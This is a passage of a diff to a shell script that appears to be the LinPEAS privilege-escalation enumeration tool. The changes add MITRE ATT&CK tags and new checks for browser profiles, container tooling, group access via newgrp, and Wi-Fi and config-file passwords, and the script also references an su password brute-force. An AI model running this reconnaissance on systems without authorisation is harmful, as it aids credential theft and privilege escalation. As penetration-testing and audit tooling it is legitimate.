"0.120" ]; then + echo "Potentially vulnerable to CVE-2021-4034 (PwnKit) - check distro patches" | sed -${E} "s,.*,${SED_RED_YELLOW}," + fi fi fi # Check polkit policies echo "" -print_3title "Polkit Policies" +print_3title "Polkit Policies" "T1548.003" for policy_dir in "/etc/polkit-1/localauthority.conf.d/" "/etc/polkit-1/rules.d/" "/usr/share/polkit-1/rules.d/"; do if [ -d "$policy_dir" ]; then echo "Checking $policy_dir:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" @@ -6118,15 +8183,18 @@ for policy_dir in "/etc/polkit-1/localauthority.conf.d/" "/etc/polkit-1/rules.d/ done # Check for polkit authentication agent echo "" -print_3title "Polkit Authentication Agent" +print_3title "Polkit Authentication Agent" "T1548.004" ps aux 2>/dev/null | grep -i "polkit" | grep -v "grep" echo "" -print_2title "Superusers and UID 0 Users" +fi + +if check_mitre_filter "T1087.001"; then +print_2title "Superusers and UID 0 Users" "T1087.001" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html" # Check /etc/passwd for UID 0 users echo "" -print_3title "Users with UID 0 in /etc/passwd" +print_3title "Users with UID 0 in /etc/passwd" "T1087.001" awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED_YELLOW},g" | sed "s,root,${SED_RED},g" if [ command -v getent >/dev/null 2>&1 ]; then for group in sudo wheel adm docker lxd lxc root shadow disk video; do @@ -6138,11 +8206,14 @@ if [ command -v getent >/dev/null 2>&1 ]; then fi # Check for users with sudo privileges in sudoers echo "" -print_3title "Users with sudo privileges in sudoers" +print_3title "Users with sudo privileges in sudoers" "T1087.001" grep -v "^#" /etc/sudoers 2>/dev/null | grep -v "^$" | grep -v "^Defaults" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED_YELLOW},g" | sed "s,root,${SED_RED},g" echo "" -print_2title "Users with console" +fi + +if check_mitre_filter "T1087.001"; then +print_2title "Users with console" "T1087.001" if [ "$MACPEAS" ]; then dscl . list /Users | while read un; do ushell=$(dscl . -read "/Users/$un" UserShell | cut -d " " -f2) @@ -6155,8 +8226,16 @@ else no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) unexpected_shells="" printf "%s\n" "$no_shells" | while read f; do - if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then - unexpected_shells="$f\n$unexpected_shells" + if [ -x "$f" ]; then + if [ "$TIMEOUT" ]; then + if $TIMEOUT 1 "$f" -c 'whoami' 2>/dev/null | grep -q "$USER"; then + unexpected_shells="$f\n$unexpected_shells" + fi + else + if "$f" -c 'whoami' 2>/dev/null | grep -q "$USER"; then + unexpected_shells="$f\n$unexpected_shells" + fi + fi fi done grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," @@ -6172,7 +8251,10 @@ else fi echo "" -print_2title "All users & groups" +fi + +if check_mitre_filter "T1087.001,T1069.001"; then +print_2title "All users & groups" "T1087.001,T1069.001" if [ "$MACPEAS" ]; then dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" else @@ -6180,66 +8262,72 @@ else fi echo "" -print_2title "Currently Logged in Users" +fi + +if check_mitre_filter "T1033"; then +print_2title "Currently Logged in Users" "T1033" # Check basic user information echo "" -print_3title "Basic user information" +print_3title "Basic user information" "T1033" (w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" # Check for active sessions echo "" -print_3title "Active sessions" +print_3title "Active sessions" "T1033" if command -v w >/dev/null 2>&1; then w 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" fi # Check for logged in users via utmp echo "" -print_3title "Logged in users (utmp)" +print_3title "Logged in users (utmp)" "T1033" if [ -f "/var/run/utmp" ]; then who -a 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" fi # Check for SSH sessions echo "" -print_3title "SSH sessions" +print_3title "SSH sessions" "T1033" if command -v ss >/dev/null 2>&1; then ss -tnp | grep ":22" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" fi # Check for screen sessions echo "" -print_3title "Screen sessions" +print_3title "Screen sessions" "T1033" if command -v screen >/dev/null 2>&1; then screen -ls 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" fi # Check for tmux sessions echo "" -print_3title "Tmux sessions" +print_3title "Tmux sessions" "T1033" if command -v tmux >/dev/null 2>&1; then tmux list-sessions 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" fi echo "" -print_2title "Last Logons and Login History" +fi + +if check_mitre_filter "T1033"; then +print_2title "Last Logons and Login History" "T1033" # Check last logins echo "" -print_3title "Last logins" +print_3title "Last logins" "T1033" if command -v last >/dev/null 2>&1; then last -n 20 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" fi # Check failed login attempts echo "" -print_3title "Failed login attempts" +print_3title "Failed login attempts" "T1033" if command -v lastb >/dev/null 2>&1; then lastb -n 20 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" fi # Check auth logs for recent logins echo "" -print_3title "Recent logins from auth.log (limit 20)" +print_3title "Recent logins from auth.log (limit 20)" "T1033" if [ -f "/var/log/auth.log" ]; then grep -i "login\|authentication\|accepted" /var/log/auth.log 2>/dev/null | tail -n 20 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g" fi # Last time logon each user echo "" if command -v lastlog >/dev/null 2>&1; then - print_3title "Last time logon each user" + print_3title "Last time logon each user" "T1033" lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," fi EXISTS_FINGER="$(command -v finger 2>/dev/null || echo -n '')" @@ -6254,15 +8342,18 @@ if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then fi echo "" +fi + +if check_mitre_filter "T1201"; then if [ "$EXTRA_CHECKS" ]; then - print_2title "Password policy" + print_2title "Password policy" "T1201" grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" echo "" if [ "$MACPEAS" ]; then - print_2title "Relevant last user info and user configs" + print_2title "Relevant last user info and user configs" "T1201" defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null echo "" - print_2title "Guest user status" + print_2title "Guest user status" "T1201" sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," @@ -6270,6 +8361,9 @@ if [ "$EXTRA_CHECKS" ]; then fi fi +fi + +if check_mitre_filter "T1110.001"; then if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC POSSIBE_SU_BRUTE=$(check_if_su_brute); @@ -6287,6 +8381,28 @@ else fi print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC +fi + +if check_mitre_filter "T1069.001"; then +print_2title "Actual Group Memberships via newgrp" "T1069.001" +# Skip this probe when running as root to avoid root-only newgrp behavior +if [ "${IAMROOT:-0}" != "1" ]; then + ActualGroup="|" + while IFS=: read -r groupname _ gid _; do + result=$(timeout 1 sh -c "echo id | newgrp \"$groupname\"" 2>/dev/null) + if echo "$result" | grep -q "uid="; then + if ! echo "${Groups}|" | grep -Fq "|${groupname}|"; then + ActualGroup="${ActualGroup}${groupname}|" + echo "Accessible group not shown in id: $groupname (gid=$gid)" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$groupsB,${SED_RED},g" + fi + fi + done < /etc/group + echo "" +fi + +fi + +fi fi echo '' @@ -6294,31 +8410,39 @@ echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if echo $CHECKS | grep -q software_information; then +if check_mitre_filter "T1082,T1587.001,T1574,T1552.001,T1552.005,T1539,T1217,T1003.003,T1613,T1555.001,T1558.003,T1190,T1552.004,T1068,T1556.003,T1505.001,T1611,T1556,T1563,T1021.004"; then print_title "Software Information" +if check_mitre_filter "T1082"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Useful software" + print_2title "Useful software" "T1082" for t in $USEFUL_SOFTWARE; do command -v "$t" || echo -n ''; done echo "" fi +fi + +if check_mitre_filter "T1587.001"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Installed Compilers" + print_2title "Installed Compilers" "T1587.001" (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); echo "" if [ "$(command -v pkg 2>/dev/null || echo -n '')" ]; then - print_2title "Vulnerable Packages" + print_2title "Vulnerable Packages" "T1587.001" pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" echo "" fi if [ "$(command -v brew 2>/dev/null || echo -n '')" ]; then - print_2title "Brew Installed Packages" + print_2title "Brew Installed Packages" "T1587.001" brew list echo "" fi fi +fi + +if check_mitre_filter "T1574"; then if [ "$MACPEAS" ]; then - print_2title "Writable Installed Applications" + print_2title "Writable Installed Applications" "T1574" system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do if [ -w "$f" ]; then echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" @@ -6331,6 +8455,9 @@ if [ "$MACPEAS" ]; then done fi +fi + +if check_mitre_filter "T1552.001"; then if [ "$PSTORAGE_APACHE_NGINX" ] || [ "$DEBUG" ]; then print_2title "Analyzing Apache-Nginx Files (limit 70)" echo "Apache version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)" @@ -6338,43 +8465,118 @@ if [ "$PSTORAGE_APACHE_NGINX" ] || [ "$DEBUG" ]; then if [ -d "/etc/apache2" ] && [ -r "/etc/apache2" ]; then grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null; fi if [ -d "/usr/share/nginx/modules" ] && [ -r "/usr/share/nginx/modules" ]; then print_3title 'Nginx modules'; ls /usr/share/nginx/modules | sed -${E} "s,$NGINX_KNOWN_MODULES,${SED_GREEN},g"; fi print_3title 'PHP exec extensions' - if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"sites-enabled$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites-enabled"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "sites-enabled$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sites-enabled$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias|command on,${SED_RED},g"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"000-default\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "000-default.conf"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "000-default\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,000-default\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"sites-enabled$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites-enabled"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "sites-enabled$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sites-enabled$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias|DocumentRoot|AllowOverride|ProxyPass|ProxyPassReverse|RemoteIPHeader|SetEnvIf.*X-Forwarded|ErrorDocument|server-status|command on,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"000-default\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "000-default.conf"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "000-default\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,000-default\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias|DocumentRoot|AllowOverride|ProxyPass|ProxyPassReverse|RemoteIPHeader|SetEnvIf.*X-Forwarded|ErrorDocument|server-status,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"php\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "php.ini"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "php\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,php\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E allow_ | grep -Ev "^;" | sed -${E} "s,On,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"nginx\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "nginx.conf"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "nginx\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,nginx\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|internal|location.+[a-zA-Z0-9][^/]\s+\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"nginx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "nginx"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "nginx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,nginx$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|internal|location.+[a-zA-Z0-9][^/]\s+\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"nginx\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "nginx.conf"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "nginx\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,nginx\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|fastcgi_pass|alias|try_files|internal|location.+[a-zA-Z0-9][^/]\s+\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_APACHE_NGINX\" | grep -E \"nginx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "nginx"; fi; fi; printf "%s" "$PSTORAGE_APACHE_NGINX" | grep -E "nginx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,nginx$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "#" | sed -${E} "s,location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|fastcgi_pass|alias|try_files|internal|location.+[a-zA-Z0-9][^/]\s+\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection,${SED_RED},g"; done; echo "";done; echo ""; fi +fi + +if check_mitre_filter "T1552.005"; then AWSVAULT="$(command -v aws-vault 2>/dev/null || echo -n '')" if [ "$AWSVAULT" ] || [ "$DEBUG" ]; then - print_2title "Check aws-vault" + print_2title "Check aws-vault" "T1552.005" aws-vault list fi +fi + +if check_mitre_filter "T1539,T1217"; then +print_2title "Browser Profiles" "T1539,T1217" +print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#browser-data" +echo "" +for h in $HOMESEARCH; do + [ -d "$h" ] || continue + firefox_ini="$h/.mozilla/firefox/profiles.ini" + if [ -f "$firefox_ini" ]; then + print_3title "Firefox profiles ($h)" "T1539,T1217" + awk -F= ' + /^\[Profile/ { in_profile=1 } + /^Path=/ { path=$2 } + /^IsRelative=/ { isrel=$2 } + /^$/ { + if (path != "") { + if (isrel == "1") { + print base "/.mozilla/firefox/" path + } else { + print path + } + } + path=""; isrel="" + } + END { + if (path != "") { + if (isrel == "1") { + print base "/.mozilla/firefox/" path + } else { + print path + } + } + } + ' base="$h" "$firefox_ini" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," + echo "" + fi + for chrome_base in "$h/.config/google-chrome" "$h/.config/chromium" "$h/.config/BraveSoftware/Brave-Browser" "$h/.config/microsoft-edge" "$h/.config/microsoft-edge-beta" "$h/.config/microsoft-edge-dev"; do + if [ -d "$chrome_base" ]; then + profiles=$(find "$chrome_base" -maxdepth 1 -type d \( -name "Default" -o -name "Profile *" \) 2>/dev/null) + if [ "$profiles" ]; then + print_3title "Chromium profiles ($chrome_base)" "T1539,T1217" + printf "%s\n" "$profiles" | sed -${E} "s,.*,${SED_RED}," + echo "" + fi + fi + done +done + +fi + +if check_mitre_filter "T1003.003"; then adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) if [ "$adhashes" ] || [ "$DEBUG" ]; then - print_2title "Searching AD cached hashes" + print_2title "Searching AD cached hashes" "T1003.003" ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null echo "" fi +fi + +if check_mitre_filter "T1613"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - containerd=$(command -v ctr || echo -n '') - if [ "$containerd" ] || [ "$DEBUG" ]; then - print_2title "Checking if containerd(ctr) is available" - print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#containerd-ctr-privilege-escalation" + containerd=$(command -v containerd || echo -n '') + containerd_cli=$(command -v ctr || echo -n '') + nerdctl_cli=$(command -v nerdctl || echo -n '') + crictl_cli=$(command -v crictl || echo -n '') + if [ "$containerd" ] || [ "$containerd_cli" ] || [ "$nerdctl_cli" ] || [ "$crictl_cli" ] || [ "$DEBUG" ]; then + print_2title "Checking if containerd/CRI tooling is available" "T1613" + print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/runtime-api-and-daemon-exposure.html" if [ "$containerd" ]; then - echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," + echo "containerd was found in $containerd" | sed -${E} "s,.*,${SED_RED}," + fi + if [ "$containerd_cli" ]; then + echo "ctr was found in $containerd_cli, you may be able to inspect or manage containerd content with it" | sed -${E} "s,.*,${SED_RED}," ctr image list 2>&1 fi + if [ "$nerdctl_cli" ]; then + echo "nerdctl was found in $nerdctl_cli, you may be able to interact with containerd namespaces and containers with it" | sed -${E} "s,.*,${SED_RED}," + nerdctl images 2>&1 + fi + if [ "$crictl_cli" ]; then + echo "crictl was found in $crictl_cli, you may be able to inspect CRI-managed containers with it" | sed -${E} "s,.*,${SED_RED}," + crictl images 2>&1 + fi echo "" fi fi +fi + +if check_mitre_filter "T1613"; then if [ "$PSTORAGE_DOCKER" ] || [ "$DEBUG" ]; then - print_2title "Searching docker files (limit 70)" - print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/index.html#docker-breakout--privilege-escalation" + print_2title "Searching docker files (limit 70)" "T1613" + print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/container-security/index.html" printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do ls -l "$f" 2>/dev/null if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then @@ -6384,10 +8586,13 @@ if [ "$PSTORAGE_DOCKER" ] || [ "$DEBUG" ]; then echo "" fi +fi + +if check_mitre_filter "T1552.001"; then # Needs testing dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) if [ "$dovecotpass" ] || [ "$DEBUG" ]; then - print_2title "Searching dovecot files" + print_2title "Searching dovecot files" "T1552.001" if [ -z "$dovecotpass" ]; then echo_not_found "dovecot credentials" else @@ -6401,9 +8606,12 @@ if [ "$dovecotpass" ] || [ "$DEBUG" ]; then echo "" fi +fi + +if check_mitre_filter "T1082"; then if [ "$PSTORAGE_MARIADB" ] || [ "$DEBUG" ]; then print_2title "Analyzing MariaDB Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mariadb.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mariadb.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*|local_infile.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "debian.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*" | sed -${E} "s,user.*|password.*|admin_address.*|debug.*|sql_warnings.*|secure_file_priv.*,${SED_RED},g"; done; echo ""; fi @@ -6505,12 +8713,13 @@ fi if [ "$PSTORAGE_WIFI_CONNECTIONS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Wifi Connections Files (limit 70)" if ! [ "`echo \"$PSTORAGE_WIFI_CONNECTIONS\" | grep -E \"system-connections$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system-connections"; fi; fi; printf "%s" "$PSTORAGE_WIFI_CONNECTIONS" | grep -E "system-connections$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,system-connections$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "psk.*" | sed -${E} "s,psk.*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_WIFI_CONNECTIONS\" | grep -E \"wpa_supplicant$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wpa_supplicant"; fi; fi; printf "%s" "$PSTORAGE_WIFI_CONNECTIONS" | grep -E "wpa_supplicant$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wpa_supplicant$,${SED_RED},"; find "$f" -name "*.conf" | while read ff; do ls -ld "$ff" | sed -${E} "s,.conf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "psk.*|password.*|ssid.*" | sed -${E} "s,psk.*|password.*|ssid.*,${SED_RED},g"; done; echo "";done; echo ""; fi if [ "$PSTORAGE_PAM_AUTH" ] || [ "$DEBUG" ]; then print_2title "Analyzing PAM Auth Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_PAM_AUTH\" | grep -E \"pam\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pam.d"; fi; fi; printf "%s" "$PSTORAGE_PAM_AUTH" | grep -E "pam\.d$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pam\.d$,${SED_RED},"; find "$f" -name "sshd" | while read ff; do ls -ld "$ff" | sed -${E} "s,sshd,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#|^@" | sed -${E} "s,auth|accessfile=|secret=|user,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_PAM_AUTH\" | grep -E \"pam\.d$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pam.d"; fi; fi; printf "%s" "$PSTORAGE_PAM_AUTH" | grep -E "pam\.d$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pam\.d$,${SED_RED},"; find "$f" -name "sshd" | while read ff; do ls -ld "$ff" | sed -${E} 